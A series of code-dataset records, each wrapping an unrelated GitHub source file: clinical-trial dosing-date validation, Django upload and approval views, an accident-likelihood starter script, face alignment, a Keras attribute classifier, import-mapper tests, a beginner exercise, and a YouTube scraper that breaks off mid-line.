pru['Date of dosing'].str.split('|').str[0]\n pru = pru.merge(df_date_visit, on=['Subject', 'to_join'], how='left')\n pru = pru.merge(df_informed, on=['Subject'], how='left')\n pru = pru.merge(df_date_visit_randomization, on=['Subject'], how='left')\n pru = pru.merge(df_adverse, on=['Subject'], how='left')\n\n\n for index, row in pru.iterrows():\n status = row['status']\n subject = row['Subject']\n visit = row['Visit']\n\n visita_comparar = row['visita_para_comparar']\n inform_consent_date = row['Inform_consent_date']\n visita_randomization = row['Visita_randomization']\n action_taken_CpG = row['action_taken_study_treatment']\n\n\n if status != '':\n try:\n date_dosing = row['Date of dosing']\n date_dosing_pure = date_dosing.split('|')[0]\n date_dosing_form_field_instance = date_dosing.split('|')[1]\n date_dosing_disname = date_dosing.split('|')[0]\n except:\n date_dosing_pure = ''\n date_dosing_form_field_instance = 'This field doesnt have any data'\n date_dosing_disname = 'Empty'\n\n try:\n reason_dose_adjustment = row['Reason for dose adjustment']\n reason_dose_adjustment_pure = reason_dose_adjustment.split('|')[0]\n reason_dose_adjustment_form_field_instance = reason_dose_adjustment.split('|')[1]\n reason_dose_adjustment_disname = reason_dose_adjustment.split('|')[2]\n except:\n reason_dose_adjustment_pure = math.nan\n reason_dose_adjustment_form_field_instance = 'This field doesnt have any data'\n reason_dose_adjustment_disname = 'Empty'\n \n try:\n dosing_event = row['Dosing Event']\n dosing_event_pure = dosing_event.split('|')[0]\n dosing_event_form_field_instance = dosing_event.split('|')[1]\n dosing_event_disname = dosing_event.split('|')[2]\n except:\n dosing_event_pure = math.nan\n dosing_event_form_field_instance = 'This field doesnt have any data'\n dosing_event_disname = 'Empty'\n # ---------------------------------------------------------------------------------------\n if date_dosing_pure == '':\n pass\n else:\n try:\n # Primera revision general de formato de fecha ->GE0020\n f = revision_fecha(date_dosing_pure)\n if f == None:\n pass\n else:\n error = [subject, visit, 'Date of dosing', date_dosing_form_field_instance,\\\n f , date_dosing_disname, 'GE0020']\n lista_revision.append(error) \n\n except Exception as e:\n lista_logs.append(f'Revision GE0020 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0020\n try:\n lista_permitidos_visita_dosing = ['D1', 'D15', 'D29']\n if visita_comparar not in lista_permitidos_visita_dosing:\n error = [subject, visit, 'Date of dosing', date_dosing_form_field_instance, \\\n 'The date must be equal to the D1, D15 or D29 date of visit', visita_comparar, 'IMP0020']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0020 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0040\n try:\n if datetime.strptime(str(date_dosing_pure), '%d-%b-%Y') >= datetime.strptime(str(inform_consent_date), '%d-%b-%Y'):\n pass\n else: \n error = [subject, visit, 'Date of dosing', date_dosing_form_field_instance, \\\n 'The date/time of dosing can not be before the informed consent date/time', date_dosing_disname, 'IMP0040']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0040 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0050\n try:\n if datetime.strptime(str(date_dosing_pure), '%d-%b-%Y') >= datetime.strptime(str(visita_randomization), '%d-%b-%Y'):\n pass\n else: \n error = [subject, visit, 'Date of dosing', \\\n date_dosing_form_field_instance, \\\n 'The date/time of dosing can not be before the randomization date/time', \\\n f'{date_dosing_disname} - {visita_randomization}', 'IMP0050']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0050 --> {e} - Subject: {subject}, Visit: {visit} ')\n \n if date_dosing == '':\n pass\n else:\n # Revision IMP0060\n try:\n if date_dosing_pure in date_dosing_list_review:\n error = [subject, visit, 'Date of dosing', \\\n date_dosing_form_field_instance, \\\n 'The dosing date can not be repeated', date_dosing_disname, 'IMP0060']\n lista_revision.append(error)\n else: \n date_dosing_list_review.append(date_dosing_pure)\n except Exception as e:\n lista_logs.append(f'Revision IMP0060 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0080\n try: \n if float(dosing_event_pure) == 2.0: \n if float(reason_dose_adjustment_pure) == 1.0:\n if float(action_taken_CpG) == 3.0:\n pass\n else:\n error = [subject, visit, 'Reason for dose adjustment', dosing_event_form_field_instance, \\\n 'If dosing event is Temporarily discontinued and the reason for adjustment is \"Adverse event\" there should be an adverse event created where the action taken (CPG ODN 035) should be CT drug stopped (temporarily)', \\\n dosing_event_disname, 'IMP0080']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0080 --> {e} - Subject: {subject}, Visit: {visit} ')\n \n # Revision IMP0090\n try:\n if float(dosing_event_pure) == 3.0:\n if float(reason_dose_adjustment_form_field_instance) == 1.0:\n if float(action_taken_CpG) == 4.0:\n pass\n else:\n error = [subject, visit, 'Reason for dose adjustment', dosing_event_form_field_instance, \\\n 'If dosing event is Permanently discontinued and the reason for adjustment is \"Adverse event\" there should be an adverse event created where the action taken (CPG ODN 035) should be CT drug stopped (permanently)', \\\n dosing_event_disname, 'IMP0090']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0090 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n \n excel_writer = load_workbook(path_excel_writer)\n column_names = ['Subject', 'Visit', 'Field', 'Form Field Instance ID' ,'Standard Error Message', 'Value', 'Check Number']\n adminsitration_CpG_ODN_output = pd.DataFrame(lista_revision, columns=column_names)\n\n\n \n sheet = excel_writer.create_sheet('CpG ODN D35 Administration')\n\n for row in dataframe_to_rows(adminsitration_CpG_ODN_output, index=False, header=True):\n sheet.append(row)\n\n excel_writer.save(path_excel_writer)\n\n log_writer(lista_logs)\n\n return adminsitration_CpG_ODN_output[['Form Field Instance ID' ,'Standard Error Message']].replace({',': '', ';': ''}, regex=True)\n\n\nif __name__ == '__main__':\n path_excel = r\"C:\\Users\\sebastian sossa\\Documents\\integraIT\\projects_integrait\\DNDI\\Program\\output\\prueba.xlsx\"\n df_root = pd.read_excel(r\"C:\\Users\\sebastian sossa\\Documents\\integraIT\\projects_integrait\\DNDI\\data\\newDNDI_v2.xlsx\")\n adminsitration_CpG_ODN(df_root, path_excel ) \n\n\n\n\n\n\n\n ","repo_name":"sebastiansossah/DNDI_cleaning_code","sub_path":"Program/code/Administration_CpG_ODN.py","file_name":"Administration_CpG_ODN.py","file_ext":"py","file_size_in_byte":13720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17499764471","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom openstreetview.forms import *\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core import serializers\nfrom openstreetview.models import *\nimport datetime\nimport json\n\ndef home(request):\n return render(request, 'index.html')\n\n\ndef signup(request):\n if request.method == 'POST':\n form = register_form(request.POST)\n if form.is_valid():\n username_ = form.cleaned_data['username']\n password_ = form.cleaned_data['password']\n email_ = form.cleaned_data['email']\n if User.objects.filter(username=username_).exists():\n form = register_form()\n error = \"User Already Exists\"\n else:\n u = User.objects.create_user(username_,email_, password_)\n u.is_active = True\n u.save()\n return HttpResponseRedirect('/')\n else:\n form = register_form()\n error = \"Invalid Inputs\" \n else:\n form = register_form()\n error = \"\"\n\n return render(request, 'useform.html', {'form': form, 'error': error})\n\n@login_required\ndef add_image(request):\n if request.method == 'POST':\n form = loc_form(request.POST)\n if form.is_valid():\n image_name_ = form.cleaned_data['docfile']\n x_loc_ = form.cleaned_data['loc_x']\n y_loc_ = form.cleaned_data['loc_y']\n img_add = image_data(image_path=image_name_, location_x=x_loc_, location_y=y_loc_,approvals=0)\n img_add.save()\n imgurl = 'http://127.0.0.1:3000/' + image_name_\n return render(request, \"complete.html\", { 'imgurl' : imgurl })\n else:\n return HttpResponse(\"naa!! -_-\")\n else:\n return HttpResponse(\"ACCESS DISABLED\")\n\n@login_required\ndef imagelocation(request, image_name):\n form = loc_form(initial={'docfile': image_name})\n return render(request, \"addimgform.html\", { 'form': form})\n \n\n@login_required\ndef upload_image(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n ext = request.FILES['docfile'].name.split('.')[1]\n request.FILES['docfile'].name = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + '.' + ext\n newdoc = Document(docfile = request.FILES['docfile'])\n newdoc.save()\n newform = loc_form(initial={'docfile': request.FILES['docfile'].name })\n return render(request, \"addimgform.html\", { 'form': newform})\n else:\n form = DocumentForm()\n\n return render(request, 'uploadform.html', {'form':form})\n\n\ndef mapdata(request):\n imgdata = image_data.objects.all()\n data = serializers.serialize('json', imgdata, indent=2)\n return HttpResponse(data, content_type='application/json')\n\n@login_required\ndef load_unapproved_images(request):\n unapprovedimages = image_data.objects.filter(approvals__lt = 2)\n return render(request, 'imageapproval.html', { 'images': unapprovedimages })\n\ndef approve_image(request):\n imglist = request.POST.getlist('approvedimages[]') \n data = json.loads(request.body)\n for img in imglist:\n image = image_data.objects.get(id=img)\n image.approvals += 1\n image.save()\n return HttpResponseRedirect(\"/\")\n\n\n","repo_name":"gaganjyot/OSV","sub_path":"OpenStreetView/openstreetview/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11147262075","text":"\"\"\"Account models.\"\"\"\n\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django.conf import settings\nfrom account import validators\n\n\nclass Profile(models.Model):\n class Meta:\n verbose_name = _(\"profile\")\n verbose_name_plural = _(\"profiles\")\n\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n verbose_name=_(\"user\"),\n )\n phone_number = models.CharField(\n validators=[\n validators.PhoneRegexValidator(\n message=_(\"Phone number must be 10 digits.\"))\n ],\n max_length=10,\n blank=True,\n verbose_name=_(\"phone number\"),\n )\n avatar = models.ForeignKey(\n \"common.Image\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n verbose_name=_(\"avatar\"),\n )\n","repo_name":"IgelVV/bg_shop_django","sub_path":"bg_shop/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17713291220","text":"#!/usr/bin/python\r\n\"\"\"\r\nCopyright 2016 Accenture and/or its affiliates. All Rights Reserved. \r\nYou may not use, copy, modify, and/or distribute this code and/or its documentation without permission from Accenture.\r\nPlease contact the Advanced Analytics-Operations Analytics team and/or Frode Huse Gjendem (lead) with any questions.\r\n\r\n\\brief This is the starter script for the Accenture's Datathon 2016 competition.\r\n\r\n\\version 1.0\r\n\r\n\\date $Date: 2016/05/17\r\n\r\n\"\"\"\r\nimport os\r\nimport gc\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport csv\r\nfrom datetime import datetime, timedelta\r\nfrom collections import OrderedDict\r\nfrom itertools import product\r\n\r\n# Enter your input data and output data paths below.\r\nPATH = \".\\datathon\\data\"\r\nOUTPATH = \".\\datathon\\results\"\r\n# Set the input data folder as default path.\r\nos.chdir(PATH)\r\n\r\ndef as_Date(stringDate):\r\n \"\"\" It formats the given string date. \r\n @param stringDate is the input string containing a date.\r\n @return a datetime object.\r\n \"\"\" \r\n month = re.sub('(^[0-9]{4})-([0-9]{1,2}|[a-zA-Z]{3,9})-([0-9]{1,2}|[a-zA-Z]{3,9})$', '\\\\2', stringDate)\r\n result = np.nan\r\n if str.isalpha(month):\r\n result = datetime.strptime(stringDate, \"%Y-%B-%d\")\r\n return result\r\n \r\ndef naive_model(training):\r\n \"\"\" It computes the naive mean model.\r\n @param training is the pandas data frame with the data.\r\n @return a dictionary-based model, where the key is the \r\n composition of .\r\n \"\"\"\r\n aggregated_data = training.Accident.groupby([training.month, training.Shift, training.GridID])\r\n count_agg = aggregated_data.count()\r\n sum_agg = aggregated_data.sum()\r\n mean_agg = sum_agg/count_agg\r\n dict_agg = mean_agg.to_dict()\r\n return dict_agg\r\n\r\n# Read the input files. Notice that it is necessary to use encoding = 'cp1252' to fix issues with file encoding. \r\naccidents = pd.read_csv(\"accidents.csv\", encoding = 'cp1252') \r\ngrid = pd.read_csv(\"city-grid.csv\")\r\ntest = pd.read_csv(\"test.csv\")\r\n\r\n# Format the dates.\r\naccidents.dropna(inplace = True)\r\naccidents.GridID = accidents.GridID.astype(int)\r\nfor i in range(0, len(accidents.date)):\r\n accidents.date.values[i] = as_Date(accidents.date.values[i])\r\n\r\n# Group at prediction level.\r\ndata = accidents[['GridID', 'date', 'Shift']].copy()\r\ndata.dropna(inplace = True)\r\ndata['Accident'] = pd.Series(1, index = data.index)\r\n\r\n# Generate the no accidents data.\r\nstart = datetime.strptime(\"2010-01-01\", \"%Y-%m-%d\")\r\nend = datetime.strptime(\"2015-01-01\", \"%Y-%m-%d\")\r\ndates = [start + timedelta(days = x) for x in range(0, (end - start).days)]\r\nShift = data.Shift.unique()\r\nGridID = data.GridID.unique()\r\ntmp = {'date': dates, 'Shift': Shift, 'GridID': GridID}\r\n# This is the typical cartessian product... pandas version...\r\nod_tmp = OrderedDict(sorted(tmp.items()))\r\ncartProd_tmp = list(product(*od_tmp.values()))\r\nnoAccidents = pd.DataFrame(cartProd_tmp, columns = od_tmp.keys())\r\nnoAccidents['Accident'] = pd.Series(0, index = noAccidents.index)\r\n# Join the data together.\r\nframes = [data, noAccidents] \r\ntraining = pd.concat(frames)\r\ntraining = pd.merge(training, grid, on = 'GridID', how = 'left')\r\ndel dates, frames, start, end, od_tmp, cartProd_tmp, accidents, noAccidents, data, tmp, Shift, grid, GridID\r\ngc.collect()\r\n\r\n# Run the naive model.\r\ntraining['month'] = pd.DatetimeIndex(training.date).month\r\nmodel = naive_model(training)\r\n\r\n# Perform the prediction.\r\nfor i in range(0, len(test.date)):\r\n test.date.values[i] = datetime.strptime(test.date.values[i], \"%Y-%m-%d\")\r\ntest['month'] = pd.DatetimeIndex(test.date).month\r\ntest['AccidentLikelihood'] = pd.Series(0.0, index = test.index)\r\nfor i in range(0, len(test)):\r\n value = 0.0\r\n try:\r\n value = model[test.month.values[i], test.Shift.values[i], test.GridID.values[i]]\r\n except KeyError:\r\n pass\r\n test.AccidentLikelihood.values[i] = value\r\n\r\n# Save the submission\r\nsubmission = test[['date', 'Shift', 'GridID', 'AccidentLikelihood']].copy()\r\n# Reshape the time to fit the submission format...\r\nfor i in range(0, len(submission)):\r\n submission.date.values[i] = datetime.strftime(submission.date.values[i], \"%Y-%m-%d\")\r\n# Write the final CSV file.\r\nsubmission.to_csv(OUTPATH + \"/submission.csv\", quoting = csv.QUOTE_NONNUMERIC, index = False)\r\n\r\n# Free memory.\r\ndel model, test, training, submission, i, value\r\ngc.collect()\r\n","repo_name":"apolitogaga/Data-test","sub_path":"code/starterScript.py","file_name":"starterScript.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19573641353","text":"# -*- coding: utf-8 -*- \n\n\"\"\"\nCreated on 2021/12/10\n\n@author: Ruoyu Chen\n\"\"\"\n\nimport os\nimport cv2\nimport numpy as np\nfrom skimage import transform as trans\n\nclass FaceAlignment():\n \"\"\"\n demo of face alignment\n \"\"\"\n def __init__(self):\n super(FaceAlignment, self).__init__()\n # init templete src\n self.init_src()\n \n def init_src(self):\n \"\"\"\n src us template, for the five common face position templates.\n \"\"\"\n src1 = np.array([[51.642, 50.115], [57.617, 49.990], [35.740, 69.007],\n [51.157, 89.050], [57.025, 89.702]],\n dtype=np.float32)\n #<--left\n src2 = np.array([[45.031, 50.118], [65.568, 50.872], [39.677, 68.111],\n [45.177, 86.190], [64.246, 86.758]],\n dtype=np.float32)\n\n #---frontal\n src3 = np.array([[39.730, 51.138], [72.270, 51.138], [56.000, 68.493],\n [42.463, 87.010], [69.537, 87.010]],\n dtype=np.float32)\n\n #-->right\n src4 = np.array([[46.845, 50.872], [67.382, 50.118], [72.737, 68.111],\n [48.167, 86.758], [67.236, 86.190]],\n dtype=np.float32)\n\n #-->right profile\n src5 = np.array([[54.796, 49.990], [60.771, 50.115], [76.673, 69.007],\n [55.388, 89.702], [61.257, 89.050]],\n dtype=np.float32)\n\n src = np.array([src1, src2, src3, src4, src5])\n\n arcface_src = np.array(\n [[38.2946, 51.6963], [73.5318, 51.5014], [56.0252, 71.7366],\n [41.5493, 92.3655], [70.7299, 92.2041]],\n dtype=np.float32)\n\n self.src_map = {112: src, 224: src * 2}\n self.arcface_src = np.expand_dims(arcface_src, axis=0)\n\n def estimate_norm(self, lmk, image_size=112, mode='arcface'):\n \"\"\"\n Estimate the warp matrix\n \"\"\"\n assert lmk.shape == (5, 2)\n tform = trans.SimilarityTransform()\n lmk_tran = np.insert(lmk, 2, values=np.ones(5), axis=1)\n min_M = []\n min_index = []\n min_error = float('inf')\n if mode == 'arcface':\n assert image_size == 112\n src = self.arcface_src\n else:\n src = self.src_map[image_size]\n for i in np.arange(src.shape[0]):\n tform.estimate(lmk, src[i])\n M = tform.params[0:2, :]\n results = np.dot(M, lmk_tran.T)\n results = results.T\n error = np.sum(np.sqrt(np.sum((results - src[i])**2, axis=1)))\n # print(error)\n if error < min_error:\n min_error = error\n min_M = M\n min_index = i\n return min_M, min_index\n \n def norm_crop(self, img, landmark, image_size=112, mode='arcface'):\n \"\"\"\n Warp the face, align\n \"\"\"\n M, pose_index = self.estimate_norm(landmark, image_size, mode)\n # warped = cv2.warpAffine(img, M, (image_size, image_size), borderValue=0.0)\n warped = cv2.warpAffine(img, M, (image_size, image_size), None, flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101 )\n return warped\n\n def __call__(self, img, landmark, image_size=112, mode='arcface'):\n \"\"\"\n img: The input image, BGR format\n landmark: (5, 2)\n image_size: crop box size\n mode: usually is arcface, other mode can has image_size 224\n \"\"\"\n wrap = self.norm_crop(img, landmark, image_size=image_size, mode=mode)\n return wrap\n","repo_name":"RuoyuChen10/FaceTechnologyTool","sub_path":"FaceRecognition/tools/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"86672985569","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport wandb\nfrom wandb.keras import WandbCallback\nimport keras\nfrom keras import layers, models\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Conv2D, Dropout,Activation,MaxPooling2D,Flatten\nfrom tensorflow.keras.optimizers import RMSprop, SGD\n\n#############\n#Carga de datos#\n#atributos = 'Base de datos/list_attr_celeba.txt'\n#atributos_modificado = 'C:/Users/wwwle/Documents/Materias_Universidad/Redes Neuronales/Proyecto-2_RNA/Base de datos/list_attr_celeba_modificado.txt'\n#with open(atributos, 'r') as f:\n #print(\"skipping: \" + f.readline())\n #print(\"skipping headers: \" + f.readline())\n #with open(atributos_modificado, 'w') as newf:\n #for line in f:\n #new_line = ' '.join(line.split())\n #newf.write(new_line)\n #newf.write('\\n')\n \n#Se definen los parámetros a utilizar\nepochs = 10\nbatch_size = 40\noptimizer = 'rmsprop'\nih, iw = 192, 192 #tamaño de la imagen\ninput_shape = (ih, iw,3)\n\n#Se define el dataframe\natributos = 'C:/Users/warri/Downloads/Proyecto-2_RNA-main/Base de datos/list_attr_celeba_modificado.txt'\ndf = pd.read_csv(atributos, sep=' ', header=None, engine='python')\n#skipfooter=135066,\n#Se separan las imagenes y sus atributos para poder modificar los valores de -1 a 0, luego se vuelven a unir\nfiles = tf.data.Dataset.from_tensor_slices(df[0])\nattributes= tf.data.Dataset.from_tensor_slices(df.iloc[:,1:].to_numpy().astype('int64')).map(lambda x: ((x+1)/2))\ndata = tf.data.Dataset.zip((files,attributes))\nruta_imagenes = 'C:/Users/warri/Downloads/Proyecto-2_RNA-main/Base de datos/img_align_celeba/'\ndef process_file(file_name, attributes):\n image = tf.io.read_file(ruta_imagenes + file_name)\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize(image, [ih,iw])\n image /= 255.0\n return image, attributes\nimagen_etiquetada = data.map(process_file).batch(batch_size)\n\n#Se definen parámetros de la red y se dividen los datos en datos de entrenamiento y prueba\nnum_train = int(len(df)*0.7)\nnum_test =len(df) - num_train\nepochs_steps = num_train // batch_size\ntest_steps = num_test // batch_size\ndata_train = imagen_etiquetada.take(num_train)\ndata_test = imagen_etiquetada.skip(num_train)\n########################################\nwandb.init(project=\"reconocimiento facial\")\nwandb.config.epochs = epochs\nwandb.config.batch_size = batch_size\nwandb.config.optimizer = optimizer\n#######################################\n#Se comienza a definir a estructura de la red neuronal\nmodel = Sequential()\n#Primera capa (Convolucional)\nmodel.add(Conv2D(40, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n#Segunda capa (Convolucional)\nmodel.add(Conv2D(80, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n#Tercera capa (Convolucional)\nmodel.add(Conv2D(120, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n#Cuarta capa (Plana)\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\n #\nmodel.add(Dense(40))\nmodel.add(Activation('sigmoid'))\n##########################################\nmodel.compile(loss='binary_crossentropy',\n optimizer=optimizer,\n metrics=['binary_accuracy'])\n#\nmodel.summary()\n#\nhistory= model.fit(data_train,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=data_test,\n validation_steps=test_steps,\n callbacks=[WandbCallback()])\n\nmodel.save('rfnn.h5')\n","repo_name":"UrielCasco01/Proyecto-2_RNA","sub_path":"Red Neuoronal/Detección de atributos.py","file_name":"Detección de atributos.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33568552032","text":"import json\nimport os\n\nimport pytest\n\nfrom taxi.internal.yt_import.schema import loaders\nimport helpers\n\n\nTESTCASES_DIRNAME = 'testcases'\n\nNOW = '2018-08-21 00:00:00.0'\n\n\ndef flatten_dict_all_levels(dct, start_level=0, prefix='', delimiter='.'):\n \"\"\"\n :param dct: dict to flatten\n :param start_level: the least included output level,\n zero includes dict itself\n :param prefix: paths prefix\n :param delimiter: delimeter to use in path\n :return: flattened dict\n\n >>> dct = {\n ... 'foo': {\n ... 'bar': {\n ... 'baz': 1,\n ... 'qux': 1\n ... }\n ... }\n ... }\n >>> flatten_dict_all_levels(dct)\n ... {\n ... # level 0\n ... 'foo': {'bar': {'baz': 1, 'qux': 1}},\n ... # level 1\n ... 'foo.bar': {'baz': 1, 'qux': 1},\n ... # level 2\n ... 'foo.bar.baz': 1,\n ... 'foo.bar.qux': 1\n ... }\n \"\"\"\n return dict(\n (key, value)\n for level, key, value in\n _flatten_items_all_levels(dct, prefix=prefix, delimiter=delimiter)\n if level >= start_level\n )\n\n\ndef _flatten_items_all_levels(dct, prefix='', delimiter='.', level=0):\n for key, value in dct.iteritems():\n if isinstance(value, dict):\n for sublevel, subkey, subvalue in _flatten_items_all_levels(\n value,\n prefix='{}{}{}'.format(prefix, key, delimiter),\n delimiter=delimiter,\n level=level + 1\n ):\n yield sublevel, subkey, subvalue\n yield level, '{}{}'.format(prefix, key), value\n else:\n yield level, '{}{}'.format(prefix, key), value\n\n\ndef _parametrize_mapper_testcase():\n import_rules = loaders.load_all_rules()\n\n parameters, ids = [], []\n for import_rule in import_rules:\n parameters.append(import_rule)\n ids.append(import_rule.name)\n\n return pytest.mark.parametrize('import_rule', parameters, ids=ids)\n\n\n@pytest.mark.now(NOW)\n@pytest.mark.asyncenv('blocking')\n@pytest.mark.filldb(_fill=False)\n@_parametrize_mapper_testcase()\ndef test_mapper(import_rule, load):\n testcase_path = os.path.join(\n TESTCASES_DIRNAME, '%s.json' % import_rule.name\n )\n testcases = json.loads(\n load(testcase_path), object_hook=helpers.bson_object_hook\n )\n\n for index, testcase in enumerate(testcases):\n if testcase.get('$byteify_input'):\n testcase['input'] = _byteify(testcase['input'])\n\n mapper = import_rule.mapper_builder(\n attributes=testcase.get('attributes')\n )\n result = mapper(testcase['input'])\n if result != testcase['expected']:\n testcase_description = (\n 'Mapper output does not match expected values %s, '\n 'document index %d. The exact difference in ' % (\n testcase_path, index\n )\n )\n helpers.check_difference(\n result, testcase['expected'], testcase_description\n )\n\n _check_testcase_fullness(import_rule, testcase_path, testcases)\n\n\ndef _check_testcase_fullness(import_rule, testcase_path, testcases):\n columns = []\n for column_mapper in (import_rule.mapper_builder.column_mappers or []):\n if not column_mapper.current_date:\n columns.append(column_mapper.output_column)\n\n for attr_mapper in (import_rule.mapper_builder.attribute_mappers or []):\n columns.append(attr_mapper.output_column)\n\n unmapped_columns = set(columns)\n for index, testcase in enumerate(testcases):\n flatten_all_levels_expected = (\n flatten_dict_all_levels(testcase['expected'])\n )\n for field, value in flatten_all_levels_expected.iteritems():\n if value is not None and field in unmapped_columns:\n unmapped_columns.remove(field)\n assert not unmapped_columns, (\n '%s: please, add not only \"value -> None\" mapper '\n 'tests for %s output columns' % (testcase_path, unmapped_columns)\n )\n\n\ndef _byteify(data):\n if isinstance(data, unicode):\n return data.encode('utf-8')\n if isinstance(data, list):\n return [_byteify(item) for item in data]\n if isinstance(data, dict):\n return {\n _byteify(key): _byteify(value)\n for key, value in data.iteritems()\n }\n return data\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests-pytest/test_internal_yt_import_mappers.py","file_name":"test_internal_yt_import_mappers.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3293713070","text":"def compare(a,b):\n if(a>b):\n print('第一个数大\\n')\n return \n if(a 20:\n numero_usuario = int(input('Digite um número > '))\n if 0 <= numero_usuario <= 20:\n print(f\"Você digitou o número {numeros_extenso[numero_usuario]}\")\n while continuar not in \"SsNn\":\n continuar = str(input('Você deseja continuar?[S/N] > ')).strip().upper()[0]\n if continuar in \"Nn\":\n break\n else:\n print(\"Opção inválida! Digite um número de 0 a 20. \")\n numero_usuario = 21\n continuar = \" \"\nprint('CALCULADORA FINALIZADA. ATÉ LOGO!')\n","repo_name":"silviorodrigues98/beginner_python_-_js_COURSES","sub_path":"CURSO EM VÍDEO/Python Intermediário/C.E.V. Mundo 3/EX72/TENTATIVA 1.py","file_name":"TENTATIVA 1.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19933022733","text":"#import grequests\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport numpy as np\r\nimport threading\r\nfrom queue import Queue\r\nimport time\r\n\r\nSEARCH_QUERY = \"healthy living\"\r\ndata = pd.read_csv('D:\\Scrapping programs\\healthy+living_urls.csv')\r\ndata = np.array(data)\r\n\r\nurls = data[:,1]\r\n\r\ndataset=[]\r\nlock = threading.Lock()\r\nq = Queue()\r\n\r\ndef myJob(url):\r\n\t\t\r\n\tdatapoint_dict = {}\r\n\tsingle_soup = BeautifulSoup(requests.get(url, timeout=5).content,'html.parser')\r\n\t#print(\"Object created\")\r\n\t# NO_OF_COMMENTS = single_soup.find(id=\"watch-discussion\")\r\n\t# print(NO_OF_COMMENTS)\r\n\tYOUTUBE_CATEGORY = single_soup.find(class_=\"content watch-info-tag-list\").findChildren(\"a\")[0].text\r\n\tchannel_tag = single_soup.find(class_=\"yt-user-info\").findChildren(\"a\")[0]\r\n\tPUBLISH_DATE = single_soup.find(class_=\"watch-time-text\").text\r\n\tDESCRIPTION = single_soup.find(id=\"eow-description\").text\r\n\tVIDEO_TITLE = single_soup.find(\"span\", class_=\"watch-title\").text.strip()\r\n\tVIDEO_VIEWS = single_soup.find(\"div\", class_=\"watch-view-count\").text\r\n\ttry:\r\n\t\tLIKES = single_soup.find('button', {\"title\": \"I like this\"}).findChildren(\"span\")[0].text\r\n\texcept:\r\n\t\tLIKES = \"0\"\r\n\ttry:\t\r\n\t\tDISLIKES = single_soup.find('button', {\"title\": \"I dislike this\"}).findChildren(\"span\")[0].text\r\n\texcept:\r\n\t\tDISLIKES = \"0\"\r\n\tCHANNEL_NAME = channel_tag.text.strip()\r\n\tdatapoint_dict['channel_name'] = CHANNEL_NAME\r\n\t#datapoint_dict['total_subscribers'] = SUBCRIBER_COUNT\r\n\tdatapoint_dict['video_url'] = url\r\n\tdatapoint_dict['video_title'] = VIDEO_TITLE\r\n\tdatapoint_dict['video_views'] = VIDEO_VIEWS\r\n\tdatapoint_dict['likes'] = LIKES\r\n\tdatapoint_dict['dislikes'] = DISLIKES\r\n\tdatapoint_dict['description'] = DESCRIPTION\r\n\tdatapoint_dict['published_date'] = PUBLISH_DATE\r\n\tdatapoint_dict['youtube_category'] = YOUTUBE_CATEGORY\r\n\twith lock:\r\n\t\tdataset.append(datapoint_dict)\r\n\t\tprint(f\"Video URL :- {url}\")\r\n\t\tprint(f\"Channel name: {CHANNEL_NAME}\")\r\n\t\t#print(f\"Subscriber count: {SUBCRIBER_COUNT}\")\r\n\t\tprint(f\"Video Title: {VIDEO_TITLE}\")\r\n\t\tprint(f\"No of views= {VIDEO_VIEWS}\")\r\n\t\tprint(f\"Likes: {LIKES}\")\r\n\t\tprint(f\"Dislikes: 